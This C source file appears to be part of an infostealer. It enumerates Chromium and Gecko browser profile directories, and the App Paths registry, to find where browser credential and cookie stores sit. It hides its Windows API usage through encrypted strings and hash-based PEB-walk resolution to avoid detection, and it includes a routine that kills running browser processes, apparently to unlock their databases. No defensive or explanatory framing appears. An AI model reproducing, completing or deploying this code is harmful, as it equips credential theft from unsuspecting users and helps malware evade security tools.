static void bp_wtoa(const WCHAR *w, char *a, size_t cap)
{
    size_t i = 0;
    while (w[i] && i < cap - 1) { a[i] = (w[i] < 128) ? (char)w[i] : '?'; i++; }
    a[i] = '\0';
}

/* ── Recursive directory scanner ──────────────────────────── */

static void bp_fs_scan(
    WCHAR *dir_w, char *dir_n,
    int depth, int max_depth, int roaming,
    BrowserPath *out, size_t cap, size_t *cnt,
    fn_fffw pFF, fn_ffnw pFN, fn_fcl pFC)
{
    if (depth > max_depth || *cnt >= cap) return;

    int    wlen = bp_wlen(dir_w);
    size_t nlen = strlen(dir_n);

    /* 1. Probe: does dir\Local State exist? */
    wchar_t wlocalstate[16];
    enc_decrypt_wide(enc_wLocalState, ENC_WLOCALSTATE_LEN, wlocalstate);
    bp_wappend(dir_w, MAX_PATH, wlocalstate);

    WIN32_FIND_DATAW fd;
    HANDLE h = pFF(dir_w, &fd);
    dir_w[wlen] = 0;                         /* restore */

    if (h != INVALID_HANDLE_VALUE) {
        pFC(h);
        if (!bp_is_dup(out, *cnt, dir_n, roaming) && *cnt < cap) {
            char name[64];
            bp_derive_name(name, sizeof(name), dir_n);
            char *pc = (char *)malloc(nlen + 1);
            char *nc = (char *)malloc(strlen(name) + 1);
            if (pc && nc) {
                memcpy(pc, dir_n, nlen + 1);
                strcpy(nc, name);
                out[*cnt].name        = nc;
                out[*cnt].path_suffix = pc;
                out[*cnt].use_roaming = roaming;
                (*cnt)++;
            } else {
                free(pc);
                free(nc);
            }
        }
        return;                              /* leaf — don't recurse deeper */
    }

    /* 2. Enumerate subdirectories */
    bp_wappend(dir_w, MAX_PATH, L"\\*");
    h = pFF(dir_w, &fd);
    dir_w[wlen] = 0;                         /* restore */
    if (h == INVALID_HANDLE_VALUE) return;

    do {
        if (!(fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) continue;
        if (fd.cFileName[0] == L'.') {
            if (fd.cFileName[1] == 0) continue;
            if (fd.cFileName[1] == L'.' && fd.cFileName[2] == 0) continue;
        }

        /* Build child wide path */
        bp_wappend(dir_w, MAX_PATH, L"\\");
        bp_wappend(dir_w, MAX_PATH, fd.cFileName);

        /* Build child narrow path */
        size_t pos = nlen;
        if (pos < MAX_PATH - 1) dir_n[pos++] = '\\';
        for (int wi = 0; fd.cFileName[wi] && pos < MAX_PATH - 1; wi++)
            dir_n[pos++] = (fd.cFileName[wi] < 128) ? (char)fd.cFileName[wi] : '?';
        dir_n[pos] = '\0';

        bp_fs_scan(dir_w, dir_n, depth + 1, max_depth, roaming,
                   out, cap, cnt, pFF, pFN, pFC);

        /* Restore buffers for next iteration */
        dir_w[wlen] = 0;
        dir_n[nlen] = '\0';
    } while (pFN(h, &fd) && *cnt < cap);

    pFC(h);
}

/* ── Public entry point ───────────────────────────────────── */

int discover_chromium_browsers_fs(BrowserPath *out, size_t max_out, size_t *count)
{
    if (!out || !max_out) return -1;
    *count = 0;

    /* Resolve kernel32 via PEB walk */
    char dll[32]; enc_decrypt(enc_kernel32, ENC_KERNEL32_LEN, dll);
    void *k32 = mirage_get_module_by_hash(mirage_encrypted_hash_module(dll));
    if (!k32) return -1;

    /* Resolve needed functions by hash (no plaintext names in IAT) */
    char fn[32];
    enc_decrypt(enc_GetEnvironmentVariableW, ENC_GETENVIRONMENTVARIABLEW_LEN, fn);
    fn_genvw pGetEnv = (fn_genvw)mirage_get_function_by_hash(
        k32, mirage_encrypted_hash_func(fn));
    enc_decrypt(enc_FindFirstFileW, ENC_FINDFIRSTFILEW_LEN, fn);
    fn_fffw pFF = (fn_fffw)mirage_get_function_by_hash(
        k32, mirage_encrypted_hash_func(fn));
    enc_decrypt(enc_FindNextFileW, ENC_FINDNEXTFILEW_LEN, fn);
    fn_ffnw pFN = (fn_ffnw)mirage_get_function_by_hash(
        k32, mirage_encrypted_hash_func(fn));
    enc_decrypt(enc_FindClose, ENC_FINDCLOSE_LEN, fn);
    fn_fcl  pFC = (fn_fcl)mirage_get_function_by_hash(
        k32, mirage_encrypted_hash_func(fn));
    if (!pGetEnv || !pFF || !pFN || !pFC) return -1;

    WCHAR base_w[MAX_PATH];
    char  base_n[MAX_PATH];

    /* Scan %LOCALAPPDATA% (roaming = 0) */
    wchar_t wlocalappdata[16];
    enc_decrypt_wide(enc_wLOCALAPPDATA, ENC_WLOCALAPPDATA_LEN, wlocalappdata);
    if (pGetEnv(wlocalappdata, base_w, MAX_PATH) > 0) {
        bp_wtoa(base_w, base_n, MAX_PATH);
        bp_fs_scan(base_w, base_n, 0, 2, 0,
                   out, max_out, count, pFF, pFN, pFC);
    }

    /* Scan %APPDATA% (roaming = 1) */
    wchar_t wappdata[16];
    enc_decrypt_wide(enc_wAPPDATA, ENC_WAPPDATA_LEN, wappdata);
    if (pGetEnv(wappdata, base_w, MAX_PATH) > 0) {
        bp_wtoa(base_w, base_n, MAX_PATH);
        bp_fs_scan(base_w, base_n, 0, 2, 1,
                   out, max_out, count, pFF, pFN, pFC);
    }

    return 0;
}

/* ════════════════════════════════════════════════════════════════ *
 *  discover_gecko_browsers_fs — filesystem-based Gecko discovery  *
 *  Scans %APPDATA% at depth ≤2 for directories containing         *
 *  profiles.ini. Derives browser name from directory name.         *
 * ════════════════════════════════════════════════════════════════ */

#ifdef _WIN32

#include <windows.h>

/* String pool — BrowserPath stores const char*, so discovered names
 * and paths must live in static storage. */
#define GECKO_FS_MAX    64
#define GECKO_NAME_LEN  128
#define GECKO_PATH_LEN  512

static char g_gecko_names[GECKO_FS_MAX][GECKO_NAME_LEN];
static char g_gecko_suffixes[GECKO_FS_MAX][GECKO_PATH_LEN];
static size_t g_gecko_pool_idx = 0;

static void *gecko_resolve_fn(void *mod, const char *name) {
    return mirage_get_function_by_hash(mod, mirage_encrypted_hash_func(name));
}

/* Wide-to-narrow (ASCII-safe for browser dir names). Returns char count. */
static int gecko_wton(const WCHAR *w, char *dst, size_t cap) {
    size_t i = 0;
    while (w[i] && i < cap - 1) { dst[i] = (char)(w[i] & 0x7F); i++; }
    dst[i] = 0;
    return (int)i;
}

/* Case-insensitive duplicate check against already-added entries. */
static int gecko_is_dup(const BrowserPath *out, size_t n, const char *suffix) {
    for (size_t i = 0; i < n; i++)
        if (_stricmp(out[i].path_suffix, suffix) == 0) return 1;
    return 0;
}

int discover_gecko_browsers_fs(BrowserPath *out, size_t max_out, size_t *count)
{
    if (!out || !count || max_out == 0) return -1;
    *count = 0;

    char dll_g[32]; enc_decrypt(enc_kernel32, ENC_KERNEL32_LEN, dll_g);
    void *k32 = mirage_get_module_by_hash(mirage_encrypted_hash_module(dll_g));
    if (!k32) return -1;

    typedef DWORD  (WINAPI *FnGetEnvW)(LPCWSTR, LPWSTR, DWORD);
    typedef HANDLE (WINAPI *FnFindFirstW)(LPCWSTR, LPWIN32_FIND_DATAW);
    typedef BOOL   (WINAPI *FnFindNextW)(HANDLE, LPWIN32_FIND_DATAW);
    typedef BOOL   (WINAPI *FnFindClose)(HANDLE);

    FnGetEnvW    pGetEnvW    = (FnGetEnvW)   ({ char fn_e[32]; enc_decrypt(enc_GetEnvironmentVariableW, ENC_GETENVIRONMENTVARIABLEW_LEN, fn_e); gecko_resolve_fn(k32, fn_e); });
    FnFindFirstW pFindFirstW = (FnFindFirstW) ({ char fn_f[32]; enc_decrypt(enc_FindFirstFileW, ENC_FINDFIRSTFILEW_LEN, fn_f); gecko_resolve_fn(k32, fn_f); });
    FnFindNextW  pFindNextW  = (FnFindNextW)  ({ char fn_n[32]; enc_decrypt(enc_FindNextFileW, ENC_FINDNEXTFILEW_LEN, fn_n); gecko_resolve_fn(k32, fn_n); });
    FnFindClose  pFindClose  = (FnFindClose)  ({ char fn_c[32]; enc_decrypt(enc_FindClose, ENC_FINDCLOSE_LEN, fn_c); gecko_resolve_fn(k32, fn_c); });
    if (!pGetEnvW || !pFindFirstW || !pFindNextW || !pFindClose) return -1;

    /* ── Get %APPDATA% ──────────────────────────────────────────── */
    WCHAR appdata[MAX_PATH + 1];
    wchar_t wappdata2[16];
    enc_decrypt_wide(enc_wAPPDATA, ENC_WAPPDATA_LEN, wappdata2);
    DWORD alen = pGetEnvW(wappdata2, appdata, MAX_PATH);
    if (alen == 0 || alen >= MAX_PATH) return 0;  /* no APPDATA → success, 0 found */
    appdata[alen] = 0;

    /* Build depth-1 search pattern: appdata\* */
    WCHAR search[MAX_PATH + 1];
    memcpy(search, appdata, alen * sizeof(WCHAR));
    search[alen]     = L'\\';
    search[alen + 1] = L'*';
    search[alen + 2] = 0;

    WIN32_FIND_DATAW fd;
    HANDLE h = pFindFirstW(search, &fd);
    if (h == INVALID_HANDLE_VALUE) return 0;

    /* Wide string for file-existence probe */
    static WCHAR w_pi[16];
    static int w_pi_init = 0;
    if (!w_pi_init) { enc_decrypt_wide(enc_wprofilesini, ENC_WPROFILESINI_LEN, w_pi); w_pi_init = 1; }
    const size_t w_pi_len = 14;  /* wcslen("\\profiles.ini") */

    do {
        if (!(fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) continue;
        /* Skip "." and ".." */
        if (fd.cFileName[0] == L'.' &&
            (fd.cFileName[1] == 0 || (fd.cFileName[1] == L'.' && fd.cFileName[2] == 0)))
            continue;

        char dname[128];
        if (!gecko_wton(fd.cFileName, dname, sizeof(dname)) || !dname[0]) continue;

        /* ── Depth 1: appdata\<dir>\profiles.ini ────────────────── */
        WCHAR probe[MAX_PATH + 1];
        size_t pos = alen;
        memcpy(probe, appdata, pos * sizeof(WCHAR));
        probe[pos++] = L'\\';
        for (const WCHAR *p = fd.cFileName; *p; p++)
            probe[pos++] = *p;
        memcpy(probe + pos, w_pi, (w_pi_len + 1) * sizeof(WCHAR));
        pos += w_pi_len;
        probe[pos] = 0;

        WIN32_FIND_DATAW fpi;
        HANDLE hp = pFindFirstW(probe, &fpi);
        if (hp != INVALID_HANDLE_VALUE) {
            pFindClose(hp);
            if (*count < max_out && g_gecko_pool_idx < GECKO_FS_MAX) {
                size_t idx = g_gecko_pool_idx;
                strncpy(g_gecko_names[idx], dname, GECKO_NAME_LEN - 1);
                g_gecko_names[idx][GECKO_NAME_LEN - 1] = 0;
                snprintf(g_gecko_suffixes[idx], GECKO_PATH_LEN, "%s\\Profiles", dname);
                if (!gecko_is_dup(out, *count, g_gecko_suffixes[idx])) {
                    out[*count].name         = g_gecko_names[idx];
                    out[*count].path_suffix  = g_gecko_suffixes[idx];
                    out[*count].use_roaming  = 1;
                    out[*count].process_name = NULL;
                    (*count)++;
                    g_gecko_pool_idx++;
                }
            }
        }

        /* ── Depth 2: appdata\<dir>\<subdir>\profiles.ini ──────── */
        WCHAR search2[MAX_PATH + 1];
        pos = alen;
        memcpy(search2, appdata, pos * sizeof(WCHAR));
        search2[pos++] = L'\\';
        for (const WCHAR *p = fd.cFileName; *p; p++)
            search2[pos++] = *p;
        search2[pos++] = L'\\';
        search2[pos++] = L'*';
        search2[pos]   = 0;

        WIN32_FIND_DATAW fd2;
        HANDLE h2 = pFindFirstW(search2, &fd2);
        if (h2 == INVALID_HANDLE_VALUE) continue;

        do {
            if (!(fd2.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) continue;
            if (fd2.cFileName[0] == L'.' &&
                (fd2.cFileName[1] == 0 || (fd2.cFileName[1] == L'.' && fd2.cFileName[2] == 0)))
                continue;

            char dname2[128];
            if (!gecko_wton(fd2.cFileName, dname2, sizeof(dname2)) || !dname2[0]) continue;

            /* Probe: appdata\<dir>\<subdir>\profiles.ini */
            WCHAR probe2[MAX_PATH + 1];
            pos = alen;
            memcpy(probe2, appdata, pos * sizeof(WCHAR));
            probe2[pos++] = L'\\';
            for (const WCHAR *p = fd.cFileName; *p; p++)
                probe2[pos++] = *p;
            probe2[pos++] = L'\\';
            for (const WCHAR *p = fd2.cFileName; *p; p++)
                probe2[pos++] = *p;
            memcpy(probe2 + pos, w_pi, (w_pi_len + 1) * sizeof(WCHAR));
            pos += w_pi_len;
            probe2[pos] = 0;

            WIN32_FIND_DATAW fpi2;
            HANDLE hp2 = pFindFirstW(probe2, &fpi2);
            if (hp2 != INVALID_HANDLE_VALUE) {
                pFindClose(hp2);
                if (*count < max_out && g_gecko_pool_idx < GECKO_FS_MAX) {
                    size_t idx = g_gecko_pool_idx;
                    strncpy(g_gecko_names[idx], dname2, GECKO_NAME_LEN - 1);
                    g_gecko_names[idx][GECKO_NAME_LEN - 1] = 0;
                    snprintf(g_gecko_suffixes[idx], GECKO_PATH_LEN,
                             "%s\\%s\\Profiles", dname, dname2);
                    if (!gecko_is_dup(out, *count, g_gecko_suffixes[idx])) {
                        out[*count].name         = g_gecko_names[idx];
                        out[*count].path_suffix  = g_gecko_suffixes[idx];
                        out[*count].use_roaming  = 1;
                        out[*count].process_name = NULL;
                        (*count)++;
                        g_gecko_pool_idx++;
                    }
                }
            }
        } while (pFindNextW(h2, &fd2));
        pFindClose(h2);

    } while (pFindNextW(h, &fd));
    pFindClose(h);

    return 0;
}

#endif /* _WIN32 */

/* ═══════ Registry-based Chromium discovery ════════════════════ *
 *
 * Scans HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
 * for .exe entries whose exe_dir contains a "User Data\Local State".
 * PEB-walk hash resolution only — no IAT imports for NT APIs.
 */

/* ── UNICODE_STRING helper (same as evasion.c) ──────────────── */
static void bp_init_unicode_string(const char *s, size_t len,
                                   UNICODE_STRING *us, WCHAR *buf,
                                   size_t buf_count)
{
    size_t cap = buf_count < len + 1 ? buf_count : len + 1;
    for (size_t i = 0; i < cap; i++)
        buf[i] = 0;
    size_t n = len < buf_count ? len : buf_count;
    for (size_t i = 0; i < n; i++)
        buf[i] = (WCHAR)(unsigned char)s[i];
    us->Length        = (USHORT)(n * sizeof(WCHAR));
    us->MaximumLength = (USHORT)(cap * sizeof(WCHAR));
    us->Buffer        = buf;
}

/* ── Duplicate-check: case-insensitive path match ───────────── */
static int bp_path_exists(const BrowserPath *arr, size_t count,
                          const char *path)
{
    for (size_t i = 0; i < count; i++) {
        if (_stricmp(arr[i].path_suffix, path) == 0)
            return 1;
    }
    return 0;
}

/* ── Wide-to-narrow (truncate low byte) ─────────────────────── */
static void bp_wchar_to_char(const WCHAR *src, size_t src_len,
                             char *dst, size_t dst_max)
{
    size_t n = src_len < dst_max - 1 ? src_len : dst_max - 1;
    for (size_t i = 0; i < n; i++)
        dst[i] = (char)(unsigned char)src[i];
    dst[n] = 0;
}

int discover_chromium_browsers_registry(BrowserPath *out,
                                        size_t max_out,
                                        size_t *count)
{
    *count = 0;

    /* ── Resolve ntdll exports via PEB walk ──────────────────── */
    char dll_r[32]; enc_decrypt(enc_ntdll, ENC_NTDLL_LEN, dll_r);
    void *ntdll = mirage_get_module_by_hash(
        mirage_encrypted_hash_module(dll_r));
    if (!ntdll) return 0;

    typedef NTSTATUS (*pNtOpenKey)(HANDLE *, ULONG, PVOID);
    typedef NTSTATUS (*pNtEnumerateKey)(HANDLE, ULONG, ULONG,
                                       PVOID, ULONG, ULONG *);
    typedef NTSTATUS (*pNtQueryValueKey)(HANDLE, PVOID, ULONG,
                                        PVOID, ULONG, ULONG *);
    typedef NTSTATUS (*pNtClose)(HANDLE);

    pNtOpenKey fnOpenKey =
        (pNtOpenKey)mirage_get_function_by_hash(ntdll, HASH_OpenKey);
    pNtEnumerateKey fnEnumKey =
        (pNtEnumerateKey)mirage_get_function_by_hash(
            ntdll, HASH_EnumerateKey);
    pNtQueryValueKey fnQueryVal =
        (pNtQueryValueKey)mirage_get_function_by_hash(
            ntdll, HASH_QueryValueKey);
    pNtClose fnClose =
        (pNtClose)mirage_get_function_by_hash(ntdll, HASH_Close);

    if (!fnOpenKey || !fnEnumKey || !fnQueryVal || !fnClose)
        return 0;

    /* ── Registry path (narrow → wide) ───────────────────────── */
    static const char reg_path[] =
        "\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows"
        "\\CurrentVersion\\App Paths";

    WCHAR us_buf[512];
    UNICODE_STRING us;
    bp_init_unicode_string(reg_path, strlen(reg_path), &us, us_buf, 512);

    /* ── Scan both native and WOW64 views ────────────────────── */
    ULONG views[] = {
        KEY_ENUMERATE_SUB_KEYS | KEY_QUERY_VALUE | KEY_WOW64_64KEY,
        KEY_ENUMERATE_SUB_KEYS | KEY_QUERY_VALUE | KEY_WOW64_32KEY
    };

    for (int v = 0; v < 2; v++) {
        OBJECT_ATTRIBUTES oa;
        memset(&oa, 0, sizeof(oa));
        oa.Length     = sizeof(OBJECT_ATTRIBUTES);
        oa.ObjectName = &us;
        oa.Attributes = OBJ_CASE_INSENSITIVE;

        HANDLE key = NULL;
        if (fnOpenKey(&key, views[v], &oa) < 0)
            continue;
        if (!key)
            continue;

        /* ── Enumerate subkeys ────────────────────────────────── */
        uint8_t enum_buf[1024];
        ULONG idx = 0;

        for (;;) {
            ULONG result_len = 0;
            NTSTATUS es = fnEnumKey(key, idx, KeyBasicInformation,
                                    enum_buf, sizeof(enum_buf),
                                    &result_len);

            if (es == (NTSTATUS)0x8000001A /* STATUS_NO_MORE_ENTRIES */)
                break;
            if (es < 0) {
                idx++;
                continue;
            }

            PKEY_BASIC_INFORMATION kbi =
                (PKEY_BASIC_INFORMATION)enum_buf;

            /* ── Convert subkey name to narrow ────────────────── */
            char subkey_name[256];
            bp_wchar_to_char(kbi->Name, kbi->NameLength / sizeof(WCHAR),
                             subkey_name, sizeof(subkey_name));

            /* Only care about .exe entries */
            size_t name_len = strlen(subkey_name);
            if (name_len < 5 || _stricmp(subkey_name + name_len - 4, ".exe") != 0) {
                idx++;
                continue;
            }

            /* ── Open the subkey and read default (empty name) value ─ */
            WCHAR subkey_buf[256];
            UNICODE_STRING subkey_us;
            bp_init_unicode_string(subkey_name, name_len,
                                   &subkey_us, subkey_buf, 256);

            OBJECT_ATTRIBUTES sub_oa;
            memset(&sub_oa, 0, sizeof(sub_oa));
            sub_oa.Length        = sizeof(OBJECT_ATTRIBUTES);
            sub_oa.RootDirectory = key;
            sub_oa.ObjectName    = &subkey_us;
            sub_oa.Attributes    = OBJ_CASE_INSENSITIVE;

            HANDLE sub_key = NULL;
            if (fnOpenKey(&sub_key,
                          KEY_QUERY_VALUE | (views[v] & 0xFF00),
                          &sub_oa) < 0 || !sub_key) {
                idx++;
                continue;
            }

            /* Read default value (empty value name) */
            WCHAR val_name_buf = 0;
            UNICODE_STRING val_name;
            val_name.Length        = 0;
            val_name.MaximumLength = sizeof(WCHAR);
            val_name.Buffer        = &val_name_buf;

            uint8_t val_buf[2048];
            ULONG val_len = 0;
            NTSTATUS qs = fnQueryVal(
                sub_key, &val_name, KeyValuePartialInformation,
                val_buf, sizeof(val_buf), &val_len);

            fnClose(sub_key);

            if (qs < 0) {
                idx++;
                continue;
            }

            PKEY_VALUE_PARTIAL_INFORMATION kvpi =
                (PKEY_VALUE_PARTIAL_INFORMATION)val_buf;

            if (kvpi->Type != 1 /* REG_SZ */ || kvpi->DataLength < 4) {
                idx++;
                continue;
            }

            /* ── Convert exe path to narrow ───────────────────── */
            char exe_path[1024];
            bp_wchar_to_char(
                (const WCHAR *)kvpi->Data,
                (kvpi->DataLength / sizeof(WCHAR)) - 1,
                exe_path, sizeof(exe_path));

            if (exe_path[0] == 0) {
                idx++;
                continue;
            }

            /* ── Derive exe_dir ───────────────────────────────── */
            char exe_dir[1024];
            strncpy(exe_dir, exe_path, sizeof(exe_dir) - 1);
            exe_dir[sizeof(exe_dir) - 1] = 0;
            char *last_slash = strrchr(exe_dir, '\\');
            if (!last_slash) last_slash = strrchr(exe_dir, '/');
            if (!last_slash) { idx++; continue; }
            *last_slash = 0;

            /* ── Probe <exe_dir>\User Data\Local State ────────── */
            char probe[1024];
            snprintf(probe, sizeof(probe),
                     "%s\\User Data\\Local State", exe_dir);
            if (!file_exists(probe)) {
                /* Try one level up (e.g. Chrome\Application → Chrome) */
                char parent_dir[1024];
                strncpy(parent_dir, exe_dir, sizeof(parent_dir) - 1);
                parent_dir[sizeof(parent_dir) - 1] = 0;
                char *ps = strrchr(parent_dir, '\\');
                if (!ps) ps = strrchr(parent_dir, '/');
                if (ps) {
                    *ps = 0;
                    snprintf(probe, sizeof(probe),
                             "%s\\User Data\\Local State", parent_dir);
                    if (!file_exists(probe)) {
                        /* Try %LOCALAPPDATA% derived path */
                        char *env_local = getenv("LOCALAPPDATA");
                        if (env_local) {
                            snprintf(probe, sizeof(probe),
                                     "%s\\%s\\User Data\\Local State",
                                     env_local, basename_of(parent_dir));
                            if (!file_exists(probe)) {
                                idx++;
                                continue;
                            }
                            /* Build path_suffix relative to LOCALAPPDATA */
                            snprintf(probe, sizeof(probe),
                                     "%s\\User Data",
                                     basename_of(parent_dir));
                        } else {
                            idx++;
                            continue;
                        }
                    } else {
                        snprintf(probe, sizeof(probe),
                                 "%s\\User Data", parent_dir);
                    }
                } else {
                    idx++;
                    continue;
                }
            } else {
                snprintf(probe, sizeof(probe),
                         "%s\\User Data", exe_dir);
            }

            /* ── Dedup by resolved path ───────────────────────── */
            if (bp_path_exists(out, *count, probe)) {
                idx++;
                continue;
            }
            /* Also check against static table */
            if (bp_path_exists(browsers, 58, probe)) {
                idx++;
                continue;
            }

            /* ── Derive browser name from exe ─────────────────── */
            char *exe_name = (char *)basename_of(exe_path);
            char browser_name[256];
            strncpy(browser_name, exe_name, sizeof(browser_name) - 1);
            browser_name[sizeof(browser_name) - 1] = 0;
            /* Strip .exe extension */
            size_t bn_len = strlen(browser_name);
            if (bn_len > 4 && _stricmp(browser_name + bn_len - 4, ".exe") == 0)
                browser_name[bn_len - 4] = 0;

            /* ── Add entry ────────────────────────────────────── */
            if (*count < max_out) {
                out[*count].name         = strdup(browser_name);
                out[*count].path_suffix  = strdup(probe);
                out[*count].use_roaming  = 0;
                out[*count].process_name = out[*count].name; /* exe stem */
                (*count)++;
            }

            idx++;
        }

        fnClose(key);
    }

    return 0;
}

/* ════════════════════════════════════════════════════════════════ *
 *  kill_browser_processes — NtGetNextProcess + NtTerminateProcess  *
 * ════════════════════════════════════════════════════════════════ */

#ifdef ENABLE_KILL_BROWSERS

/* All NT functions resolved from ntdll via PEB-walk — no engine.h needed */
typedef NTSTATUS (*fnNtGetNextProcess)(HANDLE, ULONG, ULONG, ULONG, HANDLE *);
typedef NTSTATUS (*fnNtTerminateProcess)(HANDLE, NTSTATUS);
typedef NTSTATUS (*fnNtClose)(HANDLE);
typedef NTSTATUS (*fnNtQueryInformationProcess)(HANDLE, ULONG, PVOID, ULONG, ULONG *);

/* ProcessImageFileName — kernel fills a UNICODE_STRING with the NT path */
#define ProcessImageFileName  27

#define DESIRED_ACCESS (0x0400 | 0x0001)  /* PROCESS_QUERY_INFORMATION | PROCESS_TERMINATE */

/* Case-insensitive compare of a wide-char stem (no ext) against narrow target.
 * Both are compared lowercased; stops at L'\0' / '\0'. */
static int stem_match_ci(const WCHAR *wname, int wlen, const char *target)
{
    for (int i = 0; i < wlen; i++) {
        WCHAR wc = wname[i];
        char  tc = target[i];
        if (wc >= L'A' && wc <= L'Z') wc += 32;
        if (tc >= 'A'   && tc <= 'Z')  tc += 32;
        if ((char)wc != tc) return 0;
        if (tc == '\0')    return 0;  /* target shorter */
    }
    return target[wlen] == '\0';  /* target must be same length */
}

int kill_browser_processes(const char *process_name)
{
    if (!process_name) return 0;

    char dll_k[32]; enc_decrypt(enc_ntdll, ENC_NTDLL_LEN, dll_k);
    void *ntdll = mirage_get_module_by_hash(mirage_encrypted_hash_module(dll_k));
    if (!ntdll) return 0;

    char fn_k[32];
    enc_decrypt(enc_NtGetNextProcess, ENC_NTGETNEXTPROCESS_LEN, fn_k);
    fnNtGetNextProcess pGetNext =
        (fnNtGetNextProcess)mirage_get_function_by_hash(
            ntdll, mirage_encrypted_hash_func(fn_k));
    enc_decrypt(enc_NtTerminateProcess, ENC_NTTERMINATEPROCESS_LEN, fn_k);
    fnNtTerminateProcess pTerm =
        (fnNtTerminateProcess)mirage_get_function_by_hash(
            ntdll, mirage_encrypted_hash_func(fn_k));
    enc_decrypt(enc_NtClose, ENC_NTCLOSE_LEN, fn_k);
    fnNtClose pClose =
        (fnNtClose)mirage_get_function_by_hash(
            ntdll, mirage_encrypted_hash_func(fn_k));
    enc_decrypt(enc_NtQueryInformationProcess, ENC_NTQUERYINFORMATIONPROCESS_LEN, fn_k);
    fnNtQueryInformationProcess pQIP =
        (fnNtQueryInformationProcess)mirage_get_function_by_hash(
            ntdll, mirage_encrypted_hash_func(fn_k));
    if (!pGetNext || !pTerm || !pClose || !pQIP) return 0;

    int killed = 0;
    HANDLE h = NULL;

    for (;;) {
        HANDLE next = NULL;
        NTSTATUS st = pGetNext(h, DESIRED_ACCESS, 0, 0, &next);
        if (h) pClose(h);
        if (st == STATUS_NO_MORE_ENTRIES) break;
        if (st < 0) { h = NULL; break; }
        h = next;

        /* Query image name. Kernel allocates UNICODE_STRING.Buffer; acceptable
         * leak — process exits shortly and OS reclaims all memory. */
        UNICODE_STRING img = {0, 0, NULL};
        st = pQIP(h, ProcessImageFileName, &img, sizeof(UNICODE_STRING), NULL);
        if (st < 0 || !img.Buffer || img.Length == 0) continue;

        /* Extract filename after last backslash */
        const WCHAR *name = img.Buffer;
        int nlen = img.Length / (int)sizeof(WCHAR);
        {
            int last_slash = -1;
            for (int i = 0; i < nlen; i++)
                if (img.Buffer[i] == L'\\') last_slash = i;
            if (last_slash >= 0) {
                name  = img.Buffer + last_slash + 1;
                nlen -= last_slash + 1;
            }
        }
        if (nlen <= 0) continue;

        /* Strip .exe extension */
        int stem = nlen;
        if (stem > 4) {
            const WCHAR *ext = name + stem - 4;
            if ((ext[0] == L'.') &&
                (ext[1] == L'e' || ext[1] == L'E') &&
                (ext[2] == L'x' || ext[2] == L'X') &&
                (ext[3] == L'e' || ext[3] == L'E'))
                stem -= 4;
        }

        if (!stem_match_ci(name, stem, process_name)) continue;

        /* Terminate; silently skip STATUS_ACCESS_DENIED (st < 0) */
        st = pTerm(h, 0);
        if (st >= 0) killed++;
    }
    if (h) pClose(h);
    return killed;
}

#endif /* ENABLE_KILL_BROWSERS */
